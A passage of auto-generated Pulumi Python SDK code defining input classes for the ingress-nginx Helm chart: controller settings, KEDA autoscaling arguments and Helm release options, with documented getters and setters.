Custom or additional autoscaling metrics ref: https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-custom-metrics
"""
return pulumi.get(self, "autoscaling_template")
@autoscaling_template.setter
def autoscaling_template(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]]):
pulumi.set(self, "autoscaling_template", value)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Will add custom configuration options to Nginx https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter(name="configAnnotations")
def config_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Annotations to be added to the controller config configuration configmap.
"""
return pulumi.get(self, "config_annotations")
@config_annotations.setter
def config_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "config_annotations", value)
@property
@pulumi.getter(name="configMapNamespace")
def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
"""
Allows customization of the configmap / nginx-configmap namespace.
"""
return pulumi.get(self, "config_map_namespace")
@config_map_namespace.setter
def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_map_namespace", value)
@property
@pulumi.getter(name="containerName")
def container_name(self) -> Optional[pulumi.Input[str]]:
"""
Configures the controller container name.
"""
return pulumi.get(self, "container_name")
@container_name.setter
def container_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "container_name", value)
@property
@pulumi.getter(name="containerPort")
def container_port(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
"""
Configures the ports the nginx-controller listens on.
"""
return pulumi.get(self, "container_port")
@container_port.setter
def container_port(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
pulumi.set(self, "container_port", value)
@property
@pulumi.getter(name="customTemplate")
def custom_template(self) -> Optional[pulumi.Input['ControllerCustomTemplateArgs']]:
"""
Override NGINX template.
"""
return pulumi.get(self, "custom_template")
@custom_template.setter
def custom_template(self, value: Optional[pulumi.Input['ControllerCustomTemplateArgs']]):
pulumi.set(self, "custom_template", value)
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Optionally customize the pod dnsConfig.
"""
return pulumi.get(self, "dns_config")
@dns_config.setter
def dns_config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "dns_config", value)
@property
@pulumi.getter(name="dnsPolicy")
def dns_policy(self) -> Optional[pulumi.Input[str]]:
"""
Optionally change this to ClusterFirstWithHostNet in case you have 'hostNetwork: true'. By default, while using host network, name resolution uses the host's DNS. If you wish nginx-controller to keep resolving names inside the k8s network, use ClusterFirstWithHostNet.
"""
return pulumi.get(self, "dns_policy")
@dns_policy.setter
def dns_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_policy", value)
@property
@pulumi.getter(name="electionID")
def election_id(self) -> Optional[pulumi.Input[str]]:
"""
Election ID to use for status update.
"""
return pulumi.get(self, "election_id")
@election_id.setter
def election_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "election_id", value)
@property
@pulumi.getter(name="enableMimalloc")
def enable_mimalloc(self) -> Optional[pulumi.Input[bool]]:
"""
Enable mimalloc as a drop-in replacement for malloc. ref: https://github.com/microsoft/mimalloc.
"""
return pulumi.get(self, "enable_mimalloc")
@enable_mimalloc.setter
def enable_mimalloc(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_mimalloc", value)
@property
@pulumi.getter(name="existingPsp")
def existing_psp(self) -> Optional[pulumi.Input[str]]:
"""
Use an existing PSP instead of creating one.
"""
return pulumi.get(self, "existing_psp")
@existing_psp.setter
def existing_psp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "existing_psp", value)
@property
@pulumi.getter(name="extraArgs")
def extra_args(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Additional command line arguments to pass to nginx-ingress-controller E.g. to specify the default SSL certificate you can use `default-ssl-certificate: "<namespace>/<secret_name>"`.
"""
return pulumi.get(self, "extra_args")
@extra_args.setter
def extra_args(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "extra_args", value)
@property
@pulumi.getter(name="extraContainers")
def extra_containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]:
"""
Additional containers to be added to the controller pod. See https://github.com/lemonldap-ng-controller/lemonldap-ng-controller as example.
"""
return pulumi.get(self, "extra_containers")
@extra_containers.setter
def extra_containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]):
pulumi.set(self, "extra_containers", value)
@property
@pulumi.getter(name="extraEnvs")
def extra_envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]:
"""
Additional environment variables to set.
"""
return pulumi.get(self, "extra_envs")
@extra_envs.setter
def extra_envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]):
pulumi.set(self, "extra_envs", value)
@property
@pulumi.getter(name="extraInitContainers")
def extra_init_containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]:
"""
Containers, which are run before the app containers are started. - name: init-myservice image: busybox command: ['sh', '-c', 'until nslookup myservice; do echo waiting for myservice; sleep 2; done;']
"""
return pulumi.get(self, "extra_init_containers")
@extra_init_containers.setter
def extra_init_containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]]):
pulumi.set(self, "extra_init_containers", value)
@property
@pulumi.getter(name="extraVolumeMounts")
def extra_volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]:
"""
Additional volumeMounts to the controller main container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
"""
return pulumi.get(self, "extra_volume_mounts")
@extra_volume_mounts.setter
def extra_volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]):
pulumi.set(self, "extra_volume_mounts", value)
@property
@pulumi.getter(name="extraVolumes")
def extra_volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]:
"""
Additional volumes to the controller pod. - name: copy-portal-skins emptyDir: {}
"""
return pulumi.get(self, "extra_volumes")
@extra_volumes.setter
def extra_volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]):
pulumi.set(self, "extra_volumes", value)
@property
@pulumi.getter(name="healthCheckPath")
def health_check_path(self) -> Optional[pulumi.Input[str]]:
"""
Path of the health check endpoint. All requests received on the port defined by the healthz-port parameter are forwarded internally to this path.
"""
return pulumi.get(self, "health_check_path")
@health_check_path.setter
def health_check_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_path", value)
@property
@pulumi.getter(name="heathCheckHost")
def heath_check_host(self) -> Optional[pulumi.Input[str]]:
"""
Address to bind the health check endpoint. It is better to set this option to the internal node address if the ingress nginx controller is running in the hostNetwork: true mode.
"""
return pulumi.get(self, "heath_check_host")
@heath_check_host.setter
def heath_check_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "heath_check_host", value)
@property
@pulumi.getter(name="hostNetwork")
def host_network(self) -> Optional[pulumi.Input[bool]]:
"""
Required for use with CNI based kubernetes installations (such as ones set up by kubeadm), since CNI and hostport don't mix yet. Can be deprecated once https://github.com/kubernetes/kubernetes/issues/23920 is merged.
"""
return pulumi.get(self, "host_network")
@host_network.setter
def host_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "host_network", value)
@property
@pulumi.getter(name="hostPort")
def host_port(self) -> Optional[pulumi.Input['ControllerHostPortArgs']]:
"""
Use host ports 80 and 443. Disabled by default.
"""
return pulumi.get(self, "host_port")
@host_port.setter
def host_port(self, value: Optional[pulumi.Input['ControllerHostPortArgs']]):
pulumi.set(self, "host_port", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Optionally customize the pod hostname.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
return pulumi.get(self, "image")
@image.setter
def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
pulumi.set(self, "image", value)
@property
@pulumi.getter(name="ingressClassByName")
def ingress_class_by_name(self) -> Optional[pulumi.Input[bool]]:
"""
Process IngressClass per name (additionally as per spec.controller).
"""
return pulumi.get(self, "ingress_class_by_name")
@ingress_class_by_name.setter
def ingress_class_by_name(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ingress_class_by_name", value)
@property
@pulumi.getter(name="ingressClassResource")
def ingress_class_resource(self) -> Optional[pulumi.Input['ControllerIngressClassResourceArgs']]:
"""
This section refers to the creation of the IngressClass resource. IngressClass resources are supported since k8s >= 1.18 and required since k8s >= 1.19
"""
return pulumi.get(self, "ingress_class_resource")
@ingress_class_resource.setter
def ingress_class_resource(self, value: Optional[pulumi.Input['ControllerIngressClassResourceArgs']]):
pulumi.set(self, "ingress_class_resource", value)
@property
@pulumi.getter
def keda(self) -> Optional[pulumi.Input['KedaArgs']]:
"""
Mutually exclusive with hpa autoscaling.
"""
return pulumi.get(self, "keda")
@keda.setter
def keda(self, value: Optional[pulumi.Input['KedaArgs']]):
pulumi.set(self, "keda", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
DaemonSet or Deployment.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def lifecycle(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']]:
"""
Improve connection draining when ingress controller pod is deleted using a lifecycle hook: With this new hook, we increased the default terminationGracePeriodSeconds from 30 seconds to 300, allowing the draining of connections up to five minutes. If the active connections end before that, the pod will terminate gracefully at that time. To effectively take advantage of this feature, the Configmap feature worker-shutdown-timeout new value is 240s instead of 10s.
"""
return pulumi.get(self, "lifecycle")
@lifecycle.setter
def lifecycle(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']]):
pulumi.set(self, "lifecycle", value)
@property
@pulumi.getter(name="livenessProbe")
def liveness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
"""
Liveness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
"""
return pulumi.get(self, "liveness_probe")
@liveness_probe.setter
def liveness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
pulumi.set(self, "liveness_probe", value)
@property
@pulumi.getter(name="maxmindLicenseKey")
def maxmind_license_key(self) -> Optional[pulumi.Input[str]]:
"""
Maxmind license key to download GeoLite2 Databases https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases.
"""
return pulumi.get(self, "maxmind_license_key")
@maxmind_license_key.setter
def maxmind_license_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maxmind_license_key", value)
@property
@pulumi.getter
def metrics(self) -> Optional[pulumi.Input['ControllerMetricsArgs']]:
return pulumi.get(self, "metrics")
@metrics.setter
def metrics(self, value: Optional[pulumi.Input['ControllerMetricsArgs']]):
pulumi.set(self, "metrics", value)
@property
@pulumi.getter(name="minAvailable")
def min_available(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_available")
@min_available.setter
def min_available(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_available", value)
@property
@pulumi.getter(name="minReadySeconds")
def min_ready_seconds(self) -> Optional[pulumi.Input[int]]:
"""
minReadySeconds to avoid killing pods before we are ready.
"""
return pulumi.get(self, "min_ready_seconds")
@min_ready_seconds.setter
def min_ready_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_ready_seconds", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeSelector")
def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Node labels for controller pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
"""
return pulumi.get(self, "node_selector")
@node_selector.setter
def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "node_selector", value)
@property
@pulumi.getter(name="podAnnotations")
def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations to be added to controller pods.
"""
return pulumi.get(self, "pod_annotations")
@pod_annotations.setter
def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "pod_annotations", value)
@property
@pulumi.getter(name="podLabels")
def pod_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
labels to add to the pod container metadata.
"""
return pulumi.get(self, "pod_labels")
@pod_labels.setter
def pod_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "pod_labels", value)
@property
@pulumi.getter(name="podSecurityContext")
def pod_security_context(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]:
"""
Security Context policies for controller pods.
"""
return pulumi.get(self, "pod_security_context")
@pod_security_context.setter
def pod_security_context(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]):
pulumi.set(self, "pod_security_context", value)
@property
@pulumi.getter(name="priorityClassName")
def priority_class_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "priority_class_name")
@priority_class_name.setter
def priority_class_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "priority_class_name", value)
@property
@pulumi.getter(name="proxySetHeaders")
def proxy_set_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Will add custom headers before sending traffic to backends according to https://github.com/kubernetes/ingress-nginx/tree/main/docs/examples/customization/custom-headers.
"""
return pulumi.get(self, "proxy_set_headers")
@proxy_set_headers.setter
def proxy_set_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "proxy_set_headers", value)
@property
@pulumi.getter(name="publishService")
def publish_service(self) -> Optional[pulumi.Input['ControllerPublishServiceArgs']]:
"""
Allows customization of the source of the IP address or FQDN to report in the ingress status field. By default, it reads the information provided by the service. If disable, the status field reports the IP address of the node or nodes where an ingress controller pod is running.
"""
return pulumi.get(self, "publish_service")
@publish_service.setter
def publish_service(self, value: Optional[pulumi.Input['ControllerPublishServiceArgs']]):
pulumi.set(self, "publish_service", value)
@property
@pulumi.getter(name="readinessProbe")
def readiness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
"""
Readiness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
"""
return pulumi.get(self, "readiness_probe")
@readiness_probe.setter
def readiness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
pulumi.set(self, "readiness_probe", value)
@property
@pulumi.getter(name="replicaCount")
def replica_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "replica_count")
@replica_count.setter
def replica_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "replica_count", value)
@property
@pulumi.getter(name="reportNodeInternalIp")
def report_node_internal_ip(self) -> Optional[pulumi.Input[bool]]:
"""
Bare-metal considerations via the host network https://kubernetes.github.io/ingress-nginx/deploy/baremetal/#via-the-host-network Ingress status was blank because there is no Service exposing the NGINX Ingress controller in a configuration using the host network, the default --publish-service flag used in standard cloud setups does not apply.
"""
return pulumi.get(self, "report_node_internal_ip")
@report_node_internal_ip.setter
def report_node_internal_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "report_node_internal_ip", value)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
"""
Define requests resources to avoid probe issues due to CPU utilization in busy nodes ref: https://github.com/kubernetes/ingress-nginx/issues/4735#issuecomment-551204903 Ideally, there should be no limits. https://engineering.indeedblog.com/blog/2019/12/cpu-throttling-regression-fix/
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
pulumi.set(self, "resources", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input['ControllerScopeArgs']]:
"""
Limit the scope of the controller.
"""
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input['ControllerScopeArgs']]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ControllerServiceArgs']]:
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ControllerServiceArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="startupProbe")
def startup_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
"""
Startup probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
"""
return pulumi.get(self, "startup_probe")
@startup_probe.setter
def startup_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
pulumi.set(self, "startup_probe", value)
@property
@pulumi.getter
def sysctls(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
"""
return pulumi.get(self, "sysctls")
@sysctls.setter
def sysctls(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "sysctls", value)
@property
@pulumi.getter
def tcp(self) -> Optional[pulumi.Input['ControllerTcpArgs']]:
"""
Allows customization of the tcp-services-configmap.
"""
return pulumi.get(self, "tcp")
@tcp.setter
def tcp(self, value: Optional[pulumi.Input['ControllerTcpArgs']]):
pulumi.set(self, "tcp", value)
@property
@pulumi.getter(name="terminateGracePeriodSeconds")
def terminate_grace_period_seconds(self) -> Optional[pulumi.Input[int]]:
"""
How long to wait for the drain of connections.
"""
return pulumi.get(self, "terminate_grace_period_seconds")
@terminate_grace_period_seconds.setter
def terminate_grace_period_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "terminate_grace_period_seconds", value)
@property
@pulumi.getter
def tolerations(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]:
"""
Node tolerations for server scheduling to nodes with taints Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/.
"""
return pulumi.get(self, "tolerations")
@tolerations.setter
def tolerations(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]):
pulumi.set(self, "tolerations", value)
@property
@pulumi.getter(name="topologySpreadConstraints")
def topology_spread_constraints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]]:
"""
Topology spread constraints rely on node labels to identify the topology domain(s) that each Node is in. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-topology-spread-constraints/.
"""
return pulumi.get(self, "topology_spread_constraints")
@topology_spread_constraints.setter
def topology_spread_constraints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]]):
pulumi.set(self, "topology_spread_constraints", value)
@property
@pulumi.getter
def udp(self) -> Optional[pulumi.Input['ControllerUdpArgs']]:
return pulumi.get(self, "udp")
@udp.setter
def udp(self, value: Optional[pulumi.Input['ControllerUdpArgs']]):
pulumi.set(self, "udp", value)
@property
@pulumi.getter(name="updateStrategy")
def update_strategy(self) -> Optional[pulumi.Input['ControllerUpdateStrategyArgs']]:
"""
The update strategy to apply to the Deployment or DaemonSet.
"""
return pulumi.get(self, "update_strategy")
@update_strategy.setter
def update_strategy(self, value: Optional[pulumi.Input['ControllerUpdateStrategyArgs']]):
pulumi.set(self, "update_strategy", value)
@property
@pulumi.getter(name="watchIngressWithoutClass")
def watch_ingress_without_class(self) -> Optional[pulumi.Input[bool]]:
"""
Process Ingress objects without ingressClass annotation/ingressClassName field. Overrides value for --watch-ingress-without-class flag of the controller binary. Defaults to false.
"""
return pulumi.get(self, "watch_ingress_without_class")
@watch_ingress_without_class.setter
def watch_ingress_without_class(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "watch_ingress_without_class", value)
@pulumi.input_type
class KedaScaledObjectArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Custom annotations for ScaledObject resource.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Custom annotations for ScaledObject resource.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@pulumi.input_type
class KedaTriggerArgs:
def __init__(__self__, *,
metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
type: Optional[pulumi.Input[str]] = None):
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class KedaArgs:
def __init__(__self__, *,
api_version: Optional[pulumi.Input[str]] = None,
behavior: Optional[pulumi.Input['AutoscalingBehaviorArgs']] = None,
cooldown_period: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
max_replicas: Optional[pulumi.Input[int]] = None,
min_replicas: Optional[pulumi.Input[int]] = None,
polling_interval: Optional[pulumi.Input[int]] = None,
restore_to_original_replica_count: Optional[pulumi.Input[bool]] = None,
scaled_object: Optional[pulumi.Input['KedaScaledObjectArgs']] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]] = None):
"""
:param pulumi.Input[str] api_version: apiVersion changes with keda 1.x vs 2.x: 2.x = keda.sh/v1alpha1, 1.x = keda.k8s.io/v1alpha1.
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if behavior is not None:
pulumi.set(__self__, "behavior", behavior)
if cooldown_period is not None:
pulumi.set(__self__, "cooldown_period", cooldown_period)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if max_replicas is not None:
pulumi.set(__self__, "max_replicas", max_replicas)
if min_replicas is not None:
pulumi.set(__self__, "min_replicas", min_replicas)
if polling_interval is not None:
pulumi.set(__self__, "polling_interval", polling_interval)
if restore_to_original_replica_count is not None:
pulumi.set(__self__, "restore_to_original_replica_count", restore_to_original_replica_count)
if scaled_object is not None:
pulumi.set(__self__, "scaled_object", scaled_object)
if triggers is not None:
pulumi.set(__self__, "triggers", triggers)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[pulumi.Input[str]]:
"""
apiVersion changes with keda 1.x vs 2.x: 2.x = keda.sh/v1alpha1, 1.x = keda.k8s.io/v1alpha1.
"""
return pulumi.get(self, "api_version")
@api_version.setter
def api_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_version", value)
@property
@pulumi.getter
def behavior(self) -> Optional[pulumi.Input['AutoscalingBehaviorArgs']]:
return pulumi.get(self, "behavior")
@behavior.setter
def behavior(self, value: Optional[pulumi.Input['AutoscalingBehaviorArgs']]):
pulumi.set(self, "behavior", value)
@property
@pulumi.getter(name="cooldownPeriod")
def cooldown_period(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "cooldown_period")
@cooldown_period.setter
def cooldown_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown_period", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="maxReplicas")
def max_replicas(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_replicas")
@max_replicas.setter
def max_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_replicas", value)
@property
@pulumi.getter(name="minReplicas")
def min_replicas(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_replicas")
@min_replicas.setter
def min_replicas(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_replicas", value)
@property
@pulumi.getter(name="pollingInterval")
def polling_interval(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "polling_interval")
@polling_interval.setter
def polling_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "polling_interval", value)
@property
@pulumi.getter(name="restoreToOriginalReplicaCount")
def restore_to_original_replica_count(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "restore_to_original_replica_count")
@restore_to_original_replica_count.setter
def restore_to_original_replica_count(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "restore_to_original_replica_count", value)
@property
@pulumi.getter(name="scaledObject")
def scaled_object(self) -> Optional[pulumi.Input['KedaScaledObjectArgs']]:
return pulumi.get(self, "scaled_object")
@scaled_object.setter
def scaled_object(self, value: Optional[pulumi.Input['KedaScaledObjectArgs']]):
pulumi.set(self, "scaled_object", value)
@property
@pulumi.getter
def triggers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]]:
return pulumi.get(self, "triggers")
@triggers.setter
def triggers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['KedaTriggerArgs']]]]):
pulumi.set(self, "triggers", value)
@pulumi.input_type
class ReleaseArgs:
def __init__(__self__, *,
atomic: Optional[pulumi.Input[bool]] = None,
chart: Optional[pulumi.Input[str]] = None,
cleanup_on_fail: Optional[pulumi.Input[bool]] = None,
create_namespace: Optional[pulumi.Input[bool]] = None,
dependency_update: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
devel: Optional[pulumi.Input[bool]] = None,
disable_crd_hooks: Optional[pulumi.Input[bool]] = None,
disable_openapi_validation: Optional[pulumi.Input[bool]] = None,
disable_webhooks: Optional[pulumi.Input[bool]] = None,
force_update: Optional[pulumi.Input[bool]] = None,
keyring: Optional[pulumi.Input[str]] = None,
lint: Optional[pulumi.Input[bool]] = None,
manifest: Optional[pulumi.Input[Mapping[str, Any]]] = None,
max_history: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
postrender: Optional[pulumi.Input[str]] = None,
recreate_pods: Optional[pulumi.Input[bool]] = None,
render_subchart_notes: Optional[pulumi.Input[bool]] = None,
replace: Optional[pulumi.Input[bool]] = None,
repository_opts: Optional[pulumi.Input['RepositoryOptsArgs']] = None,
reset_values: Optional[pulumi.Input[bool]] = None,
resource_names: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
reuse_values: Optional[pulumi.Input[bool]] = None,
skip_await: Optional[pulumi.Input[bool]] = None,
skip_crds: Optional[pulumi.Input[bool]] = None,
timeout: Optional[pulumi.Input[int]] = None,
value_yaml_files: Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]] = None,
values: Optional[pulumi.Input[Mapping[str, Any]]] = None,
verify: Optional[pulumi.Input[bool]] = None,
version: Optional[pulumi.Input[str]] = None,
wait_for_jobs: Optional[pulumi.Input[bool]] = None):
"""
A Release is an instance of a chart running in a Kubernetes cluster.
A Chart is a Helm package. It contains all of the resource definitions necessary to run an application, tool, or service inside of a Kubernetes cluster.
